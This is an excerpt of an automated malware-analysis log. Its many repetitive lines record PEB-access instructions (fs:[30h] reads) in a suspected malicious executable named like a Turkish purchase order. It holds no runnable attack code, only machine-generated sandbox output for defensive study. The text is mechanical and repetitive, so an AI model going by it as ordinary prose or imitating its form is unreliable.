            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B05A7 mov eax, dword ptr fs:[00000030h]5_2_017B05A7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E59C mov eax, dword ptr fs:[00000030h]5_2_0176E59C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01732582 mov eax, dword ptr fs:[00000030h]5_2_01732582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01732582 mov ecx, dword ptr fs:[00000030h]5_2_01732582
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01764588 mov eax, dword ptr fs:[00000030h]5_2_01764588
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175A470 mov eax, dword ptr fs:[00000030h]5_2_0175A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175A470 mov eax, dword ptr fs:[00000030h]5_2_0175A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175A470 mov eax, dword ptr fs:[00000030h]5_2_0175A470
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BC460 mov ecx, dword ptr fs:[00000030h]5_2_017BC460
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA456 mov eax, dword ptr fs:[00000030h]5_2_017EA456
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172645D mov eax, dword ptr fs:[00000030h]5_2_0172645D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0175245A mov eax, dword ptr fs:[00000030h]5_2_0175245A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176E443 mov eax, dword ptr fs:[00000030h]5_2_0176E443
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A430 mov eax, dword ptr fs:[00000030h]5_2_0176A430
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E420 mov eax, dword ptr fs:[00000030h]5_2_0172E420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E420 mov eax, dword ptr fs:[00000030h]5_2_0172E420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172E420 mov eax, dword ptr fs:[00000030h]5_2_0172E420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0172C427 mov eax, dword ptr fs:[00000030h]5_2_0172C427
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B6420 mov eax, dword ptr fs:[00000030h]5_2_017B6420
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01768402 mov eax, dword ptr fs:[00000030h]5_2_01768402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01768402 mov eax, dword ptr fs:[00000030h]5_2_01768402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01768402 mov eax, dword ptr fs:[00000030h]5_2_01768402
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017304E5 mov ecx, dword ptr fs:[00000030h]5_2_017304E5
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017644B0 mov ecx, dword ptr fs:[00000030h]5_2_017644B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BA4B0 mov eax, dword ptr fs:[00000030h]5_2_017BA4B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017364AB mov eax, dword ptr fs:[00000030h]5_2_017364AB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017EA49A mov eax, dword ptr fs:[00000030h]5_2_017EA49A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01738770 mov eax, dword ptr fs:[00000030h]5_2_01738770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01740770 mov eax, dword ptr fs:[00000030h]5_2_01740770
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730750 mov eax, dword ptr fs:[00000030h]5_2_01730750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BE75D mov eax, dword ptr fs:[00000030h]5_2_017BE75D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772750 mov eax, dword ptr fs:[00000030h]5_2_01772750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772750 mov eax, dword ptr fs:[00000030h]5_2_01772750
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B4755 mov eax, dword ptr fs:[00000030h]5_2_017B4755
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176674D mov esi, dword ptr fs:[00000030h]5_2_0176674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176674D mov eax, dword ptr fs:[00000030h]5_2_0176674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176674D mov eax, dword ptr fs:[00000030h]5_2_0176674D
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176273C mov eax, dword ptr fs:[00000030h]5_2_0176273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176273C mov ecx, dword ptr fs:[00000030h]5_2_0176273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176273C mov eax, dword ptr fs:[00000030h]5_2_0176273C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AC730 mov eax, dword ptr fs:[00000030h]5_2_017AC730
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C720 mov eax, dword ptr fs:[00000030h]5_2_0176C720
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C720 mov eax, dword ptr fs:[00000030h]5_2_0176C720
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01730710 mov eax, dword ptr fs:[00000030h]5_2_01730710
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01760710 mov eax, dword ptr fs:[00000030h]5_2_01760710
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C700 mov eax, dword ptr fs:[00000030h]5_2_0176C700
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017347FB mov eax, dword ptr fs:[00000030h]5_2_017347FB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017347FB mov eax, dword ptr fs:[00000030h]5_2_017347FB
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017527ED mov eax, dword ptr fs:[00000030h]5_2_017527ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017527ED mov eax, dword ptr fs:[00000030h]5_2_017527ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017527ED mov eax, dword ptr fs:[00000030h]5_2_017527ED
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BE7E1 mov eax, dword ptr fs:[00000030h]5_2_017BE7E1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173C7C0 mov eax, dword ptr fs:[00000030h]5_2_0173C7C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B07C3 mov eax, dword ptr fs:[00000030h]5_2_017B07C3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017307AF mov eax, dword ptr fs:[00000030h]5_2_017307AF
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017E47A0 mov eax, dword ptr fs:[00000030h]5_2_017E47A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D678E mov eax, dword ptr fs:[00000030h]5_2_017D678E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01762674 mov eax, dword ptr fs:[00000030h]5_2_01762674
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F866E mov eax, dword ptr fs:[00000030h]5_2_017F866E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017F866E mov eax, dword ptr fs:[00000030h]5_2_017F866E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A660 mov eax, dword ptr fs:[00000030h]5_2_0176A660
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A660 mov eax, dword ptr fs:[00000030h]5_2_0176A660
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174C640 mov eax, dword ptr fs:[00000030h]5_2_0174C640
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174E627 mov eax, dword ptr fs:[00000030h]5_2_0174E627
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01766620 mov eax, dword ptr fs:[00000030h]5_2_01766620
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01768620 mov eax, dword ptr fs:[00000030h]5_2_01768620
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173262C mov eax, dword ptr fs:[00000030h]5_2_0173262C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01772619 mov eax, dword ptr fs:[00000030h]5_2_01772619
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE609 mov eax, dword ptr fs:[00000030h]5_2_017AE609
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0174260B mov eax, dword ptr fs:[00000030h]5_2_0174260B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE6F2 mov eax, dword ptr fs:[00000030h]5_2_017AE6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE6F2 mov eax, dword ptr fs:[00000030h]5_2_017AE6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE6F2 mov eax, dword ptr fs:[00000030h]5_2_017AE6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE6F2 mov eax, dword ptr fs:[00000030h]5_2_017AE6F2
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B06F1 mov eax, dword ptr fs:[00000030h]5_2_017B06F1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B06F1 mov eax, dword ptr fs:[00000030h]5_2_017B06F1
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0176A6C7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176A6C7 mov eax, dword ptr fs:[00000030h]5_2_0176A6C7
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017666B0 mov eax, dword ptr fs:[00000030h]5_2_017666B0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0176C6A6 mov eax, dword ptr fs:[00000030h]5_2_0176C6A6
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734690 mov eax, dword ptr fs:[00000030h]5_2_01734690
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01734690 mov eax, dword ptr fs:[00000030h]5_2_01734690
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4978 mov eax, dword ptr fs:[00000030h]5_2_017D4978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017D4978 mov eax, dword ptr fs:[00000030h]5_2_017D4978
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BC97C mov eax, dword ptr fs:[00000030h]5_2_017BC97C
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01756962 mov eax, dword ptr fs:[00000030h]5_2_01756962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01756962 mov eax, dword ptr fs:[00000030h]5_2_01756962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01756962 mov eax, dword ptr fs:[00000030h]5_2_01756962
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E mov eax, dword ptr fs:[00000030h]5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E mov edx, dword ptr fs:[00000030h]5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0177096E mov eax, dword ptr fs:[00000030h]5_2_0177096E
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B0946 mov eax, dword ptr fs:[00000030h]5_2_017B0946
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B892A mov eax, dword ptr fs:[00000030h]5_2_017B892A
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C892B mov eax, dword ptr fs:[00000030h]5_2_017C892B
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BC912 mov eax, dword ptr fs:[00000030h]5_2_017BC912
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728918 mov eax, dword ptr fs:[00000030h]5_2_01728918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01728918 mov eax, dword ptr fs:[00000030h]5_2_01728918
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE908 mov eax, dword ptr fs:[00000030h]5_2_017AE908
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017AE908 mov eax, dword ptr fs:[00000030h]5_2_017AE908
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017629F9 mov eax, dword ptr fs:[00000030h]5_2_017629F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017629F9 mov eax, dword ptr fs:[00000030h]5_2_017629F9
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BE9E0 mov eax, dword ptr fs:[00000030h]5_2_017BE9E0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_0173A9D0 mov eax, dword ptr fs:[00000030h]5_2_0173A9D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017649D0 mov eax, dword ptr fs:[00000030h]5_2_017649D0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017FA9D3 mov eax, dword ptr fs:[00000030h]5_2_017FA9D3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017C69C0 mov eax, dword ptr fs:[00000030h]5_2_017C69C0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_01804940 mov eax, dword ptr fs:[00000030h]5_2_01804940
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B89B3 mov esi, dword ptr fs:[00000030h]5_2_017B89B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B89B3 mov eax, dword ptr fs:[00000030h]5_2_017B89B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017B89B3 mov eax, dword ptr fs:[00000030h]5_2_017B89B3
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017429A0 mov eax, dword ptr fs:[00000030h]5_2_017429A0
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017309AD mov eax, dword ptr fs:[00000030h]5_2_017309AD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017309AD mov eax, dword ptr fs:[00000030h]5_2_017309AD
            Source: C:\Users\user\Desktop\03.07.2024-sipari#U015f UG01072410 -onka ve Tic a.s.exeCode function: 5_2_017BE872 mov eax, dword ptr fs:[00000030h]5_2_017BE872
